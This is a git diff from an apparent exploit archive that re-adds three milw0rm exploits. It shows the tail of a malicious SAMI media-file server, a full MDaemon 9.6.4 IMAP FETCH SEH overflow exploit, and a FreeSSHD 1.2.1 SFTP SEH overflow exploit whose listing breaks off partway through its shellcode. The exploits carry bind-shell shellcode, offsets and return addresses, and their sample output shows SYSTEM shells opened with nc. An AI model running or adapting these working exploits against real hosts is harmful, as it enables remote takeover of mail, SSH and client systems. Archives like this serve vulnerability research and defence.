+body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77'        # ShortJmp, and SEH overwrite
+body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
+body += 143505*'E' + '">'
+body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
+
+# RESPONSE HEADER 
+header = (
+'HTTP/1.1 200 OK\r\n'
+'Content-Type: application/smil\r\n'
+'\r\n'
+)
+
+evilbuf = header + body
+s = socket(AF_INET, SOCK_STREAM)
+s.bind(("0.0.0.0", 80))
+s.listen(1)
+print "[+] Listening on port 80"
+c, addr = s.accept()
+print "[+] Connection accepted from: %s" % (addr[0])
+c.recv(1024)
+c.send(evilbuf)
+print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
+c.close()
+s.close()
+
+# milw0rm.com [2008-01-08]
diff --git a/platforms/windows/remote/5248.py b/platforms/windows/remote/5248.py
index 531c0e720..5e2eb2040 100755
--- a/platforms/windows/remote/5248.py
+++ b/platforms/windows/remote/5248.py
@@ -1,155 +1,155 @@
-#!/usr/bin/python
-###############################################################################
-#
-# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
-# Bug discovered and coded by Matteo Memelli aka ryujin 
-# http://www.gray-world.net http://www.be4mind.com
-#
-# Affected Versions : MDaemon IMAP server v9.6.4 
-# Tested on OS      : Windows 2000 SP4 English
-#                     Windows XP Sp2 English
-#                     Windows 2003 Standard Edition Italian
-# Discovery Date               : 03/13/2008
-#
-#-----------------------------------------------------------------------------
-#
-# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
-#
-# Thx to Silvia for feeding my obsessions
-# Thx to didNot at #offsec 
-# (yes he doesn't look like Silvia but he's a nice guy LOL)
-# and to www.offensive-security.com
-#
-#-----------------------------------------------------------------------------
-##############################################################################
-# [+] Connecting to imap server...
-# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
-#
-# [+] Logging in...
-# 0001 OK LOGIN completed
-#
-# [+] Selecting Inbox Folder...
-# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
-# * 16 EXISTS
-# * 16 RECENT
-# * OK [UNSEEN 1] first unseen
-# * OK [UIDVALIDITY 1205411202] UIDs valid
-# * OK [UIDNEXT 17] Predicted next UID
-# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
-# 0002 OK [READ-WRITE] SELECT completed
-#
-# [+] We need at least one message in Inbox, appending one...
-# + Ready for append literal
-#
-# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
-# * 17 EXISTS
-# * 17 RECENT
-# 0003 OK [APPENDUID 1205411202 17] APPEND completed
-#
-# [+] DINNER'S READY: Sending Evil Buffer...
-# [+] DONE! Check your shell on 192.168.1.195:4444
-#
-#
-# matte@badrobot:~$ nc 192.168.1.195 4444
-# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
-# matte@badrobot:~$ nc 192.168.1.195 4444
-# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-2000 Microsoft Corp.
-#
-# C:\MDaemon\APP>whoami
-# whoami
-# NT AUTHORITY\SYSTEM
-#
-# C:\MDaemon\APP>
-##############################################################################
-
-from socket import *
-from optparse import OptionParser
-import sys, time
-
-print "[*********************************************************************]"
-print "[*                                                                   *]"
-print "[*    MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT     *]"
-print "[*                      DISCOVERED AND CODED                         *]"
-print "[*                               by                                  *]"
-print "[*                         MATTEO MEMELLI                            *]" 
-print "[*                            (ryujin)                               *]" 
-print "[*              www.be4mind.com - www.gray-world.net                 *]"
-print "[*                                                                   *]"
-print "[*********************************************************************]"
-usage =  "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
-parser = OptionParser(usage=usage)
-parser.add_option("-H", "--target_host", type="string",
-                  action="store", dest="HOST",
-                  help="Target Host")
-parser.add_option("-P", "--target_port", type="int",
-                  action="store", dest="PORT",
-                  help="Target Port")
-parser.add_option("-l", "--login-user", type="string",
-                  action="store", dest="USER",
-                  help="User login")
-parser.add_option("-p", "--login-password", type="string",
-                  action="store", dest="PASSWD",
-                  help="User password")
-(options, args) = parser.parse_args()
-HOST    = options.HOST
-PORT    = options.PORT
-USER    = options.USER
-PASSWD  = options.PASSWD
-if not (HOST and PORT and USER and PASSWD):
-   parser.print_help()
-   sys.exit()
-
-# windows/shell_bind_tcp - 317 bytes
-# http://www.metasploit.com
-# EXITFUNC=thread, LPORT=4444
-shellcode = (
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
-"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
-"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
-"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
-"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
-"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
-"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
-"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
-"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
-"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
-"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
-"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
-"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
-"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
-"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
-"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
-"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
-"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
-"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
-"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
-"\xff\xd0"
-)
-
-s = socket(AF_INET, SOCK_STREAM)
-print " [+] Connecting to imap server..."
-s.connect((HOST, PORT))
-print s.recv(1024)
-print " [+] Logging in..."
-s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
-print s.recv(1024)
-print " [+] Selecting Inbox Folder..."
-s.send("0002 SELECT Inbox\r\n")
-print s.recv(1024)
-print " [+] We need at least one message in Inbox, appending one..."
-s.send('0003 APPEND Inbox {1}\r\n')
-print s.recv(1024)
-print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
-s.send('SPAGHETTI AND PWNSAUCE\r\n')
-print s.recv(1024)
-print " [+] DINNER'S READY: Sending Evil Buffer..."
-# Seh overwrite at 532 Bytes 
-# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
-EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35 
-s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
-s.close()
-print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
-
-# milw0rm.com [2008-03-13]
+#!/usr/bin/python
+###############################################################################
+#
+# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
+# Bug discovered and coded by Matteo Memelli aka ryujin 
+# http://www.gray-world.net http://www.be4mind.com
+#
+# Affected Versions : MDaemon IMAP server v9.6.4 
+# Tested on OS      : Windows 2000 SP4 English
+#                     Windows XP Sp2 English
+#                     Windows 2003 Standard Edition Italian
+# Discovery Date               : 03/13/2008
+#
+#-----------------------------------------------------------------------------
+#
+# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
+#
+# Thx to Silvia for feeding my obsessions
+# Thx to didNot at #offsec 
+# (yes he doesn't look like Silvia but he's a nice guy LOL)
+# and to www.offensive-security.com
+#
+#-----------------------------------------------------------------------------
+##############################################################################
+# [+] Connecting to imap server...
+# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
+#
+# [+] Logging in...
+# 0001 OK LOGIN completed
+#
+# [+] Selecting Inbox Folder...
+# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
+# * 16 EXISTS
+# * 16 RECENT
+# * OK [UNSEEN 1] first unseen
+# * OK [UIDVALIDITY 1205411202] UIDs valid
+# * OK [UIDNEXT 17] Predicted next UID
+# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
+# 0002 OK [READ-WRITE] SELECT completed
+#
+# [+] We need at least one message in Inbox, appending one...
+# + Ready for append literal
+#
+# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
+# * 17 EXISTS
+# * 17 RECENT
+# 0003 OK [APPENDUID 1205411202 17] APPEND completed
+#
+# [+] DINNER'S READY: Sending Evil Buffer...
+# [+] DONE! Check your shell on 192.168.1.195:4444
+#
+#
+# matte@badrobot:~$ nc 192.168.1.195 4444
+# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
+# matte@badrobot:~$ nc 192.168.1.195 4444
+# Microsoft Windows 2000 [Version 5.00.2195]
+# (C) Copyright 1985-2000 Microsoft Corp.
+#
+# C:\MDaemon\APP>whoami
+# whoami
+# NT AUTHORITY\SYSTEM
+#
+# C:\MDaemon\APP>
+##############################################################################
+
+from socket import *
+from optparse import OptionParser
+import sys, time
+
+print "[*********************************************************************]"
+print "[*                                                                   *]"
+print "[*    MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT     *]"
+print "[*                      DISCOVERED AND CODED                         *]"
+print "[*                               by                                  *]"
+print "[*                         MATTEO MEMELLI                            *]" 
+print "[*                            (ryujin)                               *]" 
+print "[*              www.be4mind.com - www.gray-world.net                 *]"
+print "[*                                                                   *]"
+print "[*********************************************************************]"
+usage =  "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
+parser = OptionParser(usage=usage)
+parser.add_option("-H", "--target_host", type="string",
+                  action="store", dest="HOST",
+                  help="Target Host")
+parser.add_option("-P", "--target_port", type="int",
+                  action="store", dest="PORT",
+                  help="Target Port")
+parser.add_option("-l", "--login-user", type="string",
+                  action="store", dest="USER",
+                  help="User login")
+parser.add_option("-p", "--login-password", type="string",
+                  action="store", dest="PASSWD",
+                  help="User password")
+(options, args) = parser.parse_args()
+HOST    = options.HOST
+PORT    = options.PORT
+USER    = options.USER
+PASSWD  = options.PASSWD
+if not (HOST and PORT and USER and PASSWD):
+   parser.print_help()
+   sys.exit()
+
+# windows/shell_bind_tcp - 317 bytes
+# http://www.metasploit.com
+# EXITFUNC=thread, LPORT=4444
+shellcode = (
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
+"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
+"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
+"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
+"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
+"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
+"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
+"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
+"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
+"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
+"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
+"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
+"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
+"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
+"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
+"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
+"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
+"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
+"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
+"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
+"\xff\xd0"
+)
+
+s = socket(AF_INET, SOCK_STREAM)
+print " [+] Connecting to imap server..."
+s.connect((HOST, PORT))
+print s.recv(1024)
+print " [+] Logging in..."
+s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
+print s.recv(1024)
+print " [+] Selecting Inbox Folder..."
+s.send("0002 SELECT Inbox\r\n")
+print s.recv(1024)
+print " [+] We need at least one message in Inbox, appending one..."
+s.send('0003 APPEND Inbox {1}\r\n')
+print s.recv(1024)
+print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
+s.send('SPAGHETTI AND PWNSAUCE\r\n')
+print s.recv(1024)
+print " [+] DINNER'S READY: Sending Evil Buffer..."
+# Seh overwrite at 532 Bytes 
+# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
+EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35 
+s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
+s.close()
+print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
+
+# milw0rm.com [2008-03-13]
diff --git a/platforms/windows/remote/5751.pl b/platforms/windows/remote/5751.pl
index c4f98d8d1..470ae98e4 100755
--- a/platforms/windows/remote/5751.pl
+++ b/platforms/windows/remote/5751.pl
@@ -1,143 +1,143 @@
-#!/usr/bin/perl
-###############################################################################
-#   FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/     #
-#    Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709      #
-#                                                                             #
-#                  Coded by Matteo Memelli aka ryujin                         #
-#                        `Spaghetti & PwnSauce`                               #
-#         >> http://www.be4mind.com  http://www.gray-world.net <<             #
-#                                                                             #
-#         Tested on Windows XPSp2 EN / Windows Vista Ultimate EN              #
-#      Offset for SEH overwrite is 3 Bytes greater in Windows Vista           #                   
-#                   Reliable Exploitation needs SSC :)                        #                   
-#                                                                             #
-#          `I Miss Python but...I Gotta learn some perl too ;)`               #
-#            `Cheers to #offsec friends and to my bro s4tan`                  #
-###############################################################################
-#                                                                             # 
-# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2               #
-# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow                          #
-# [+] Coded by Matteo Memelli aka ryujin                                      #
-# [+] SSC: Stack Spring Cleaning... >> rm thisJunk <<                         #
-# [+] Exploiting FreSSHDService...                                            #
-# [+] Sending Payload...                                                      #
-# [*] Done! CTRL-C and check your shell on port 4444                          #
-#                                                                             #
-# bt POCS # nc 10.150.0.228 4444                                              #
-# Microsoft Windows [Version 6.0.6000]                                        #
-# Copyright (c) 2006 Microsoft Corporation.  All rights reserved.             #
-#                                                                             #
-# C:\Users\ryujin\Desktop>                                                    #
-#                                                                             #
-###############################################################################
-
-use strict;
-use Net::SSH2;
-
-my $numArgs = $#ARGV + 1;
-if ($numArgs != 5) {
-   print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
-   print "TARGET: 1 -> XPSP2\n";
-   print "TARGET: 2 -> VISTA\n";
-   exit;
-}
-
-# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes 
-# ExitFunc=SEH
-my $shellcode = 
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
-"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48".
-"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x4b\x48\x4e\x47".
-"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38".
-"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x34".
-"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x58".
-"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d".
-"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
-"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x50\x45\x4a\x36".
-"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
-"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x57\x43\x37".
-"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
-"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e".
-"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x36\x44\x50".
-"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
-"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x43\x35\x43\x54".
-"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
-"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x4a\x36\x46\x4a".
-"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
-"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
-"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
-"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x4f\x4f\x48\x4d".
-"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
-"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
-"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
-"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c".
-"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x33\x42\x4c".
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x52".
-"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
-"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f".
-"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x41\x35\x4c\x46".
-"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x36".
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
-"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
-"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
-"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
-"\x4f\x4f\x42\x4d\x5a";
-
-my $nops      = "\x90"x64;
-my $offset1xp = "\x41"x242;
-my $offset1vi = "\x41"x226;
-my $offset2xp = "\x41"x24;
-my $offset2vi = "\x41"x43;
-my $ppr       = "\xde\x13\x40";         
-my $jmpsxp    = "\xeb\xe1\x90\x90";     
-my $jmpsvi    = "\xeb\xce\x90\x90";     
-my $jmpn      = "\xe9\x23\xfc\xff\xff"; 
-my $ip        = $ARGV[0];
-my $port      = int($ARGV[1]);
-my $user      = $ARGV[2];
-my $pass      = $ARGV[3];
-my $payload   = '';
-if ($ARGV[4] == '1')
-{
-   $payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
-}
-elsif ($ARGV[4] == '2')
-{
-   $payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;  
-}
-else
-{
-   print "[-] TARGET ERROR!\n";
-   exit;
-}
-print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
-print "[+] Coded by Matteo Memelli aka ryujin\n";
-print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
-# If you start the exploit before any other connection, everything is fine
-# otherwise exploit could become less reliable. 
-# So let's rm some junk before exploiting our app...
-for (my $count = 30; $count >= 1; $count--) {
-   my $ssh2 = Net::SSH2->new();
-   $ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
-   $ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
-   $ssh2->disconnect();
-}
-my $ssh2 = Net::SSH2->new();
-$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
-$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
-print "[+] Exploiting FreSSHDService...\n";
-print "[+] Sending Payload...\n";
-print "[*] Done! CTRL-C and check your shell on port 4444\n";
-my $sftp = $ssh2->sftp();
-my $bad  = $sftp->opendir($payload);
-exit;
-
-# milw0rm.com [2008-06-06]
+#!/usr/bin/perl
+###############################################################################
+#   FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/     #
+#    Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709      #
+#                                                                             #
+#                  Coded by Matteo Memelli aka ryujin                         #
+#                        `Spaghetti & PwnSauce`                               #
+#         >> http://www.be4mind.com  http://www.gray-world.net <<             #
+#                                                                             #
+#         Tested on Windows XPSp2 EN / Windows Vista Ultimate EN              #
+#      Offset for SEH overwrite is 3 Bytes greater in Windows Vista           #                   
+#                   Reliable Exploitation needs SSC :)                        #                   
+#                                                                             #
+#          `I Miss Python but...I Gotta learn some perl too ;)`               #
+#            `Cheers to #offsec friends and to my bro s4tan`                  #
+###############################################################################
+#                                                                             # 
+# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2               #
+# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow                          #
+# [+] Coded by Matteo Memelli aka ryujin                                      #
+# [+] SSC: Stack Spring Cleaning... >> rm thisJunk <<                         #
+# [+] Exploiting FreSSHDService...                                            #
+# [+] Sending Payload...                                                      #
+# [*] Done! CTRL-C and check your shell on port 4444                          #
+#                                                                             #
+# bt POCS # nc 10.150.0.228 4444                                              #
+# Microsoft Windows [Version 6.0.6000]                                        #
+# Copyright (c) 2006 Microsoft Corporation.  All rights reserved.             #
+#                                                                             #
+# C:\Users\ryujin\Desktop>                                                    #
+#                                                                             #
+###############################################################################
+
+use strict;
+use Net::SSH2;
+
+my $numArgs = $#ARGV + 1;
+if ($numArgs != 5) {
+   print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
+   print "TARGET: 1 -> XPSP2\n";
+   print "TARGET: 2 -> VISTA\n";
+   exit;
+}
+
+# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes 
+# ExitFunc=SEH
+my $shellcode = 
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
+"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48".
+"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x4b\x48\x4e\x47".
+"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38".
+"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x34".
+"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x58".
+"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d".
+"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
+"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x50\x45\x4a\x36".
+"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
+"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x57\x43\x37".
+"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
+"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e".
+"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x36\x44\x50".
+"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
+"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x43\x35\x43\x54".
+"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
+"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x4a\x36\x46\x4a".
+"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
+"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
+"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
+"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x4f\x4f\x48\x4d".
+"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
+"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
